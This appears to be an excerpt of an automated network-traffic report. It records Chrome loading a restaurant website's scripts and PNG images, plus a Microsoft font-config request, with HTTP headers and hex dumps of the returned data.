                                                                                                                                                    Data Ascii: /*! WOW - v1.1.3 - 2016-05-06* Copyright (c) 2016 Matthieu Aussaguel;*/(function(){var a,b,c,d,e,f=function(a,b){return function(){return a.apply(b,arguments)}},g=[].indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(b in this&&this[b]===a)return


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    18192.168.2.449762162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:29 UTC569OUTGET /assets/js/foodhut.js HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:29 UTC278INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/javascript
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 1161
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:29 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:29 UTC1161INData Raw: 2f 2a 21 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 2a 20 46 6f 6f 64 48 75 74 20 4c 61 6e 64 69 6e 67 20 70 61 67 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 0a 2a 20 43 6f 70 79 72 69 67 68 74 3a 20 32 30 31 39 20 44 65 76 43 52 55 44 20 28 68 74 74 70 73 3a 2f 2f 64 65 76 63 72 75 64 2e 63 6f 6d 29 0a 2a 20 4c 69 63 65 6e 73 65 64 3a 20 28 68 74 74 70 73 3a 2f 2f 64 65 76 63 72 75 64 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 73 29 0a 2a 20 43 6f 64 65 64 20 62 79 20 77 77 77 2e 64 65 76 63 72
                                                                                                                                                    Data Ascii: /*!=========================================================* FoodHut Landing page=========================================================* Copyright: 2019 DevCRUD (https://devcrud.com)* Licensed: (https://devcrud.com/licenses)* Coded by www.devcr


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    19192.168.2.449758162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:29 UTC630OUTGET /assets/imgs/icon3.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:29 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:29 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 20691
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:29 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:29 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5e 00 00 00 64 08 06 00 00 00 0f 33 87 a5 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 39 e1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR^d3pHYsttfx9iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:29 UTC4659INData Raw: 7e 19 11 5d 43 44 db f7 a7 0e 9f 42 cf 27 51 14 bd 4c 44 da 22 f2 c7 00 ac 88 bc b1 7c 0e 11 91 52 ea 8d 5e 88 5e e7 75 ff fa 4a 7c 90 74 6b ed 24 d0 eb 00 de a1 b5 be 96 88 b6 4f a0 73 0f a8 46 44 48 d3 f4 d5 4a a9 b7 58 6b af ea 74 3a 7f e2 9c 5b 24 a2 41 da cf bf cb 85 5e 75 be dd 3b 0a 7a 2d f0 a6 72 88 1f 00 2f 8a 62 00 78 c8 25 6a ad 07 fc bc 52 0a ce b9 26 80 6b a2 28 7a f1 81 2e e5 13 fc fe 16 80 d7 8b c8 b5 cc 7c b2 31 e6 7d 22 f2 ac 72 ce b5 1c 37 12 d1 eb 8b a2 f8 b0 d6 5a a6 cc b9 12 80 94 99 0b 00 96 ba dd ee c4 ce 8d 00 7e 4e 44 3e a8 b5 be fc 60 05 bd fc 7e 00 7e 20 22 cf 60 e6 07 95 52 c6 39 f7 11 ad f5 cb 47 9c 07 00 9d a2 28 ae d0 5a 7f 61 58 1b 04 ca bb d5 6a 8d 74 b9 9d 73 da 0f 18 ab 15 f4 75 2b 11 5d af b5 be fc 60 52 2d 13 74 fe e3
                                                                                                                                                    Data Ascii: ~]CDB'QLD"|R^^uJ|tk$OsFDHJXkt:[$A^u;z-r/bx%jR&k(z.|1}"r7Z~ND>`~~ "`R9G(ZaXjtsu+]`R-t


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    20192.168.2.449763184.28.90.27443
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:29 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                    2024-10-01 04:26:29 UTC515INHTTP/1.1 200 OK
                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                    Server: ECAcc (lpl/EF06)
                                                                                                                                                    X-CID: 11
                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                    X-Ms-Region: prod-weu-z1
                                                                                                                                                    Cache-Control: public, max-age=217105
                                                                                                                                                    Date: Tue, 01 Oct 2024 04:26:29 GMT
                                                                                                                                                    Content-Length: 55
                                                                                                                                                    Connection: close
                                                                                                                                                    X-CID: 2
                                                                                                                                                    2024-10-01 04:26:29 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    21192.168.2.449769162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC382OUTGET /assets/imgs/cook_lunch.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 85483
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR=2pHYs?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22
                                                                                                                                                    Data Ascii: <?xpacket end="w"
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 30 90 0e 52 6f d6 c8 16 cb 6c dd bc 0b 21 05 51 18 9c 1f 0c b5 d7 d2 0e 9d f0 f9 4f 7e 8c c3 c7 4f 93 97 6b 4c a4 21 04 86 58 d3 46 4b 03 08 c1 d0 02 89 26 23 7a f8 51 0d d7 b6 08 5a 2d ec e0 0c 9e 97 23 58 3c 81 95 ab 70 f1 8f fd 01 32 eb 91 36 56 40 ac b5 0b 25 12 b4 42 12 11 c5 11 fe e8 06 86 af 7d 39 fe f0 08 ab 47 ee a1 d0 07 8b 2b 35 7a bd 0e 78 fd 24 4a b3 f1 f2 ab 11 6e 3f c6 ea 12 0b 47 9f 66 a1 51 62 6c db 25 f4 82 2c f1 ca 59 54 7c 94 6e bd 8a 19 81 76 4d 72 79 4d 26 69 62 1a 01 96 33 8a 59 5c 4f 87 06 33 0b 16 7d 7e 44 46 28 0c 27 62 76 c5 e2 6f ee 89 38 7c 72 89 2f dd fd 28 d6 d0 76 2e cf f7 d0 67 0e b3 60 6c e1 e4 43 77 e0 0f 6d a0 32 bc 85 20 b8 97 d1 6b d6 d3 5d ac f3 89 0f 9c 61 ef 59 9b d4 f3 89 a2 88 fa 8a c2 ce b8 0c af 33 39 71 26 66
                                                                                                                                                    Data Ascii: 0Rol!QO~OkL!XFK&#zQZ-#X<p26V@%B}9G+5zx$Jn?GfQbl%,YT|nvMryM&ib3Y\O3}~DF('bvo8|r/(v.g`lCwm2 k]aY39q&f
                                                                                                                                                    2024-10-01 04:26:30 UTC15252INData Raw: d2 fd 61 16 27 5f e6 e4 a3 4d 8a 4b 70 cb ed 02 42 43 e0 fa 89 12 e9 40 80 67 17 35 02 a3 dd 7c 6c 57 84 c5 17 27 c9 a7 fb e9 5b 3f 8e a4 65 29 36 63 5c 3d f9 1c f5 cb 33 0c 1d f1 d8 91 8d 53 53 b6 50 0e 5d c0 2d e6 28 cc 4d 93 ee cf 22 4b 75 7a 36 6d c3 6f 95 69 2f 9c a7 c5 3b 51 d3 1b a9 1f bf 46 38 d1 a6 5d 33 b4 d7 34 87 ce 9d 39 1d c9 9a 84 b6 df f4 00 a1 9d 77 12 76 41 b6 f3 f8 34 90 5c 01 d7 0b d0 72 3d a4 b6 43 22 1a a6 d5 69 e3 99 0e 46 ad 49 0d e8 e0 b0 24 40 d0 b7 70 17 16 b8 f2 e4 4b dc 73 c7 dd fc d6 1f 7e 8a 16 20 a8 2a 85 d5 65 3e fe 4b 1f e6 d2 ec 0a fd aa f0 aa eb 62 0d 33 2c 88 12 aa ec 33 97 f3 b8 75 cf 56 7e fb 0f 3e 43 c5 7c b5 6f 06 04 e5 d5 14 d2 57 03 62 5c d7 c7 73 c0 73 6c 1c 1f 82 89 28 37 9e 3f 41 73 ea 1c 83 e3 9b 71 44 0d 79
                                                                                                                                                    Data Ascii: a'_MKpBC@g5|lW'[?e)6c\=3SSP]-(M"Kuz6moi/;QF8]349wvA4\r=C"iFI$@pKs~ *e>Kb3,3uV~>C|oWb\ssl(7?AsqDy
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: f7 7f 29 e8 0e ff de 6d 0b 80 6d 59 44 a3 a1 6f a7 62 b1 8f da c5 06 61 45 42 ec 1d c6 b7 db c8 46 15 41 92 08 ea 22 92 e6 e2 29 6b a1 8b 04 42 d8 b6 8b 67 37 88 38 6d 04 57 80 70 8a ba eb 63 ad 5c 24 10 0a e1 e8 49 ec 40 08 51 ed 60 d6 1a 38 af 66 3d 8b a2 84 e7 09 f8 be 04 82 8f e3 75 f0 5d e9 27 42 fe 89 a0 ad 26 96 1a 44 1d fb 59 c2 63 6f 65 cf 8e 59 ca 53 97 30 3b 0a 92 51 c7 cc dc 45 78 34 81 e2 97 c9 5f 99 c1 9b 9b c6 b2 a1 83 4a 04 87 78 bc 9b ee 5d 3f 43 c8 be 41 be d8 0b f2 f3 44 33 43 68 eb f6 b1 b5 5d 26 3f 7d 9e 48 28 88 5b f7 30 ab a7 a9 fb 30 32 7e 84 80 55 c2 6b aa b4 17 3c a6 f2 33 b4 db 22 f7 ec d5 b8 6f 77 0c ad 37 ce 8d 25 8b e1 43 5d 44 0f ff 1e 66 b3 40 5b 5d 41 93 43 44 f0 31 44 11 cf 36 51 08 a1 a4 b6 50 2d 5c 5f e3 90 17 cb 84 9d
                                                                                                                                                    Data Ascii: )mmYDobaEBFA")kBg78mWpc\$I@Q`8f=u]'B&DYcoeYS0;QEx4_Jx]?CAD3Ch]&?}H([002~Uk<3"ow7%C]Df@[]ACD1D6QP-\_
                                                                                                                                                    2024-10-01 04:26:30 UTC5047INData Raw: eb 6d 49 6b 72 4c 30 6d 94 4c 28 d8 60 15 14 7e c1 c1 2a da 6c 6e b6 31 4a 43 ec da f3 43 24 4b d7 f1 4a 2d d2 66 03 ab 1b d1 5d 85 b1 03 c3 54 46 0e e1 fb e7 48 7a ab c8 d4 26 29 f5 b3 b5 31 4f 71 62 1f 3d cb 22 5c db 62 ac 14 b0 da 7c 8a 90 19 74 90 11 2c 5e a3 cf 2d 93 ce 1c 21 d0 db 36 7a 59 af 4b d4 78 8e f2 e0 6e ea 63 7b e9 6c 5d 23 ce 35 56 d9 a1 7d e3 22 5b 51 8b b6 75 84 57 fc 9d ff 07 a1 56 10 22 65 63 ed 22 f3 5f 78 0f 9b de 28 6e e5 36 56 97 cf d0 f9 ec 17 58 3d fb 39 b6 62 b8 ff 95 33 14 47 27 39 f3 e2 a3 ac 5c df 8c e6 db e9 df 29 ef e4 3f 0c 16 fe a7 b1 89 6f 5f 40 83 24 17 90 46 f9 0f 8b 72 e9 b4 33 39 f9 ab ae 2a 22 ad 1c c3 b0 51 c2 46 db 0a e9 59 e8 38 42 b7 03 a4 cc c9 2c 8f dc 2e c0 da 26 85 be 49 74 71 8c 24 0a c8 55 be ed 2c 95 04
                                                                                                                                                    Data Ascii: mIkrL0mL(`~*ln1JCC$KJ-f]TFHz&)1Oqb="\b|t,^-!6zYKxnc{l]#5V}"[QuWV"ec"_x(n6VX=9b3G'9\)?o_@$Fr39*"QFY8B,.&Itq$U,


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    22192.168.2.449771162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC376OUTGET /assets/imgs/logo.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Tue, 26 Sep 2023 19:55:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 171446
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16031INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 74 00 00 01 a7 08 06 00 00 00 a7 c9 ac d2 00 00 00 09 70 48 59 73 00 00 21 d5 00 00 21 d5 01 04 9c b4 9d 00 00 39 f0 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDRtpHYs!!9iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 95 ed 3f 3b bf ae bf 9f 29 bf 89 6d 83 53 68 19 63 b8 50 a4 6c 2b ac 30 c7 a6 f3 e3 8c cc 69 e0 55 ab 56 72 65 bb 40 9b 05 1e ee e8 a2 20 32 58 68 a6 94 4f 57 5e 72 5e ad 43 e7 c7 3f b6 be e5 f2 ad 7b 85 93 58 f7 af 3a 3b e1 4b 3f 57 3b 3f 55 d5 1e 7a 55 d5 7f 92 ec 78 f1 ce 60 b4 e3 0f b1 64 da e1 a1 ce 13 24 55 9c 94 4a f0 40 c7 59 06 c6 87 49 5a 7d 5c b0 b5 96 7f 7e e7 0a 2e 5c 17 11 d5 c3 c1 13 7d 1c 3f 3d 84 a9 eb 69 f5 5a 00 9f 1d 72 8a 9c 97 62 fe 89 1e e7 d4 c7 6f 5e 05 8c fd eb 0f 0e fe c7 c5 19 55 55 d5 40 af aa fa 0f f2 af d6 8b eb c8 df f5 b3 c6 e6 64 3f 5d 16 fc f1 c5 61 de be 64 0d 9f 5c bb 1e 9d cf f3 c7 a7 4f 80 5a 0e f9 66 28 27 11 83 82 29 bb 9d 5f 1d e8 25 54 11 7f bb 66 1e d7 37 39 84 52 d1 61 c0 d1 a8 82 61 3a 54 ee 78 dc f1 c7 fb 4f
                                                                                                                                                    Data Ascii: ?;)mShcPl+0iUVre@ 2XhOW^r^C?{X:;K?W;?UzUx`d$UJ@YIZ}\~.\}?=iZrbo^UU@d?]ad\OZf(')_%Tf79Raa:TxO
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 7e a6 8a 1e 42 3a f8 e5 12 8b da 9b 99 d9 de 88 95 d6 f8 f9 29 92 e5 02 b3 4d c1 f2 59 73 39 72 f2 0c 9d 53 59 7c db a1 e0 04 0c 4c 4c 50 93 d6 dc fc ae a5 7c e9 4d 4b 99 43 19 d5 be 86 8f df be 87 1f 3d 7a 8a c0 aa c5 14 10 53 3e 2e 02 6d 9a 68 ed 71 e9 fc 38 2d 71 88 10 2f d5 47 31 bd 0f e1 a5 dd cb 49 e9 53 67 6b fa 8e ee 6a c9 97 8b c7 47 fb 3a fb 2d 43 9f 71 52 f5 05 21 8d d4 ff 34 08 5f 55 0d f4 bf 9c 30 8f 0e f5 df f7 c1 b9 fa 85 2f ce cd 9c 7d ae 29 d6 f3 5c 93 d3 bf a3 d5 1a 7a a6 be 51 77 61 38 60 3a 36 a6 65 23 1c 1b 19 4b 20 63 29 8c 64 0a d2 0d f4 94 db f8 e9 83 fd 94 23 85 81 8f 25 6c 2a 06 10 77 38 d1 35 49 63 a6 99 4b d6 b6 a3 0a 27 99 db 94 e1 b2 2d 1b 58 3b 6f 36 35 39 9f d1 81 29 8a 48 52 1a ae 5b b9 9c 4b d2 0d 48 df 20 74 92 9c 55 05
                                                                                                                                                    Data Ascii: ~B:)MYs9rSY|LLP|MKC=zS>.mhq8-q/G1ISgkjG:-CqR!4_U0/})\zQwa8`:6e#K c)d#%l*w85IcK'-X;o659)HR[KH tU
                                                                                                                                                    2024-10-01 04:26:30 UTC15252INData Raw: a4 8f e2 bb f8 96 4f 62 f6 5c 94 b6 79 14 ec 32 b6 36 4c b6 b3 1f 51 b4 b1 71 b1 84 42 28 a2 f0 c3 2f 5c c8 8c ea 2c be 7d 8c 86 42 17 a7 cd 0e b8 f3 9b 17 d2 da 56 45 d9 1f 66 e1 bb 96 33 e7 9a d3 09 52 26 9a 0a bb 8f 1d 64 8f 93 e7 79 2f c3 8f 0f 6e 66 50 08 74 1b 34 3f 4b a0 14 41 4a 54 5f a0 a2 b0 ee a8 e4 68 41 e1 03 e7 8e 43 51 2a 0c 39 2e 36 1e 84 a0 aa 51 c5 a1 44 56 d3 38 88 c2 f8 69 55 48 ab 8b e9 e3 6a b1 a2 2d fc fc 91 5d 14 d1 d0 19 e2 bc 85 cd c8 62 18 a9 9b 18 61 9b b0 5e 41 33 2a 38 e1 3c 5e a8 84 90 0e 7a dd 54 dc ea 29 6c 78 fb 18 9a 0a aa a9 e7 e6 cc 9e 35 47 28 4a db 2d df bd fd cc 9e ec 81 f5 5f f8 f2 97 d7 3d bb 76 80 cb 3f 7e 0f 37 dc be 9e 8e fc 44 e6 2f be 84 51 75 d5 ac 5c 3a 9d 85 4b e6 13 d0 cc fa dd 31 de ff 9d 8d bc fb 4b cf
                                                                                                                                                    Data Ascii: Ob\y26LQqB(/\,}BVEf3R&dy/nfPt4?KAJT_hACQ*9.6QDV8iUHj-]ba^A3*8<^zT)lx5G(J-_=v?~7D/Qu\:K1K
